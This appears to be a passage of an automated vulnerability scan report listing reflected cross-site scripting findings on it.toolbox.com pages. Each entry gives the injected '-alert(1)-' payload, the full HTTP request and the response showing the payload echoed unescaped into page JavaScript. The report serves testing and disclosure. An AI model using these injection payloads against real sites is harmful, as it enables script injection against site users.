ctaDtClicked = new Date();
    var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fBlogMain.aspx%3fslug%3dppmtoday%266fb19'-alert(1)-'c89de4fa829';
    ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
   
    document.getElementById('ctaimage').src = ckUrl;
// G
...[SNIP]...

3.80. http://it.toolbox.com/blogs/ppmtoday/the-emergent-comedy-39924 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/ppmtoday/the-emergent-comedy-39924

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 670b8'-alert(1)-'7dcaf45a1ad was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blogs/ppmtoday/the-emergent-comedy-39924?670b8'-alert(1)-'7dcaf45a1ad=1 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 68919
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- &lt=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:46:38 GMT; path=/
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:46:38 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   The Emergen
...[SNIP]...
Clicked)
{
ctaBtnClicked = sender;
ctaDtClicked = new Date();
    var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fentry.aspx%3fslug%3dppmtoday%26i%3d39924%26670b8'-alert(1)-'7dcaf45a1ad%3d1';
    ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
   
    document.getElementById('ctaimage').src = ckUrl;

...[SNIP]...

3.81. http://it.toolbox.com/blogs/ppmtoday/the-wocket-in-your-pocket-42008 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/ppmtoday/the-wocket-in-your-pocket-42008

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2c0c4'-alert(1)-'6f5648481ff was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blogs/ppmtoday/2c0c4'-alert(1)-'6f5648481ff HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 63836
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:46:13 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Future Stat
...[SNIP]...
!= ctaBtnClicked)
{
ctaBtnClicked = sender;
ctaDtClicked = new Date();
    var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fBlogMain.aspx%3fslug%3dppmtoday%262c0c4'-alert(1)-'6f5648481ff';
    ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
   
    document.getElementById('ctaimage').src = ckUrl;
// G
...[SNIP]...

3.82. http://it.toolbox.com/blogs/ppmtoday/the-wocket-in-your-pocket-42008 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/ppmtoday/the-wocket-in-your-pocket-42008

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b5e9d'-alert(1)-'a125a80c31c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blogs/ppmtoday/the-wocket-in-your-pocket-42008?b5e9d'-alert(1)-'a125a80c31c=1 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 69550
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- &lt=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:45:35 GMT; path=/
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:45:34 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   The Wocket
...[SNIP]...
Clicked)
{
ctaBtnClicked = sender;
ctaDtClicked = new Date();
    var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fentry.aspx%3fslug%3dppmtoday%26i%3d42008%26b5e9d'-alert(1)-'a125a80c31c%3d1';
    ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
   
    document.getElementById('ctaimage').src = ckUrl;

...[SNIP]...

3.83. http://it.toolbox.com/blogs/ppmtoday/two-old-pals-41071 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/ppmtoday/two-old-pals-41071

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cd3d0'-alert(1)-'863012dc017 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blogs/ppmtoday/cd3d0'-alert(1)-'863012dc017 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 63836
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:46:08 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Future Stat
...[SNIP]...
!= ctaBtnClicked)
{
ctaBtnClicked = sender;
ctaDtClicked = new Date();
    var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fBlogMain.aspx%3fslug%3dppmtoday%26cd3d0'-alert(1)-'863012dc017';
    ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
   
    document.getElementById('ctaimage').src = ckUrl;
// G
...[SNIP]...

3.84. http://it.toolbox.com/blogs/ppmtoday/two-old-pals-41071 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/ppmtoday/two-old-pals-41071

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5f617'-alert(1)-'679cdacb38f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blogs/ppmtoday/two-old-pals-41071?5f617'-alert(1)-'679cdacb38f=1 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 68775
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- &lt=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:45:34 GMT; path=/
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:45:33 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Two Old Pal
...[SNIP]...
Clicked)
{
ctaBtnClicked = sender;
ctaDtClicked = new Date();
    var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fentry.aspx%3fslug%3dppmtoday%26i%3d41071%265f617'-alert(1)-'679cdacb38f%3d1';
    ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
   
    document.getElementById('ctaimage').src = ckUrl;

...[SNIP]...

3.85. http://it.toolbox.com/blogs/ppmtoday/venture-and-gender-43847 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/ppmtoday/venture-and-gender-43847

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4a8a5'-alert(1)-'91b7ec83dbe was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blogs/ppmtoday/4a8a5'-alert(1)-'91b7ec83dbe HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 63838
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:46:06 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Future Stat
...[SNIP]...
!= ctaBtnClicked)
{
ctaBtnClicked = sender;
ctaDtClicked = new Date();
    var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fBlogMain.aspx%3fslug%3dppmtoday%264a8a5'-alert(1)-'91b7ec83dbe';
    ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
   
    document.getElementById('ctaimage').src = ckUrl;
// G
...[SNIP]...

3.86. http://it.toolbox.com/blogs/ppmtoday/venture-and-gender-43847 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/ppmtoday/venture-and-gender-43847

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ee209'-alert(1)-'185afe72fe1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blogs/ppmtoday/venture-and-gender-43847?ee209'-alert(1)-'185afe72fe1=1 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 66189
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- &lt=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:45:26 GMT; path=/
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:45:26 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Venture and
...[SNIP]...
Clicked)
{
ctaBtnClicked = sender;
ctaDtClicked = new Date();
    var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fentry.aspx%3fslug%3dppmtoday%26i%3d43847%26ee209'-alert(1)-'185afe72fe1%3d1';
    ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
   
    document.getElementById('ctaimage').src = ckUrl;

...[SNIP]...

3.87. http://it.toolbox.com/blogs/ppmtoday/why-should-i-change-40067 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/ppmtoday/why-should-i-change-40067

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d0965'-alert(1)-'e613cc08901 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blogs/ppmtoday/d0965'-alert(1)-'e613cc08901 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 63836
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:46:49 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Future Stat
...[SNIP]...
!= ctaBtnClicked)
{
ctaBtnClicked = sender;
ctaDtClicked = new Date();
    var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fBlogMain.aspx%3fslug%3dppmtoday%26d0965'-alert(1)-'e613cc08901';
    ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
   
    document.getElementById('ctaimage').src = ckUrl;
// G
...[SNIP]...

3.88. http://it.toolbox.com/blogs/ppmtoday/why-should-i-change-40067 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/ppmtoday/why-should-i-change-40067

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 28cff'-alert(1)-'27a3eb6d893 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blogs/ppmtoday/why-should-i-change-40067?28cff'-alert(1)-'27a3eb6d893=1 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 81340
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- &lt=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:46:17 GMT; path=/
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:46:17 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Why Should
...[SNIP]...
Clicked)
{
ctaBtnClicked = sender;
ctaDtClicked = new Date();
    var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fentry.aspx%3fslug%3dppmtoday%26i%3d40067%2628cff'-alert(1)-'27a3eb6d893%3d1';
    ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
   
    document.getElementById('ctaimage').src = ckUrl;

...[SNIP]...

3.89. http://it.toolbox.com/communities/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /communities/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 75c02'-alert(1)-'c6fa87a6781 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /communities/?75c02'-alert(1)-'c6fa87a6781=1 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 48832
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:49:11 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Toolbox for
...[SNIP]...
ctaBtnClicked) {
ctaBtnClicked = sender;
ctaDtClicked = new Date();
var myUrl = 'http%3a%2f%2fit.toolbox.com%2funicorn%2fCommunityDirectory.aspx%2f%3f75c02'-alert(1)-'c6fa87a6781%3d1';
ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;

document.getElementById('ctaimage').src = ckUrl;

...[SNIP]...

3.90. http://it.toolbox.com/groups/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /groups/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 341e6'-alert(1)-'a97f04ef44c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /groups/?341e6'-alert(1)-'a97f04ef44c=1 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 79118
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:48:50 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   IT Groups

...[SNIP]...
& sender != ctaBtnClicked) {
ctaBtnClicked = sender;
ctaDtClicked = new Date();
var myUrl = 'http%3a%2f%2fit.toolbox.com%2fgroups%2fdefault.aspx%2f%3f341e6'-alert(1)-'a97f04ef44c%3d1';
ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;

document.getElementById('ctaimage').src = ckUrl;

...[SNIP]...

3.91. http://it.toolbox.com/people/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /people/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7358f'-alert(1)-'29ad29ac991 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /people7358f'-alert(1)-'29ad29ac991/ HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 114921
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:49:39 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   People Sear
...[SNIP]...
sender != ctaBtnClicked) {
ctaBtnClicked = sender;
ctaDtClicked = new Date();
var myUrl = 'http%3a%2f%2fit.toolbox.com%2fpeople%2fPeopleSearch.aspx%3f7358f'-alert(1)-'29ad29ac991%2f';
ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;

document.getElementById('ctaimage').src = ckUrl;

...[SNIP]...

3.92. http://it.toolbox.com/people/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /people/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eabb0'-alert(1)-'c1d1138c1b9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /people/?eabb0'-alert(1)-'c1d1138c1b9=1 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 114677
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:49:01 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   People Sear
...[SNIP]...
sender != ctaBtnClicked) {
ctaBtnClicked = sender;
ctaDtClicked = new Date();
var myUrl = 'http%3a%2f%2fit.toolbox.com%2fpeople%2fPeopleSearch.aspx%3feabb0'-alert(1)-'c1d1138c1b9%3d1';
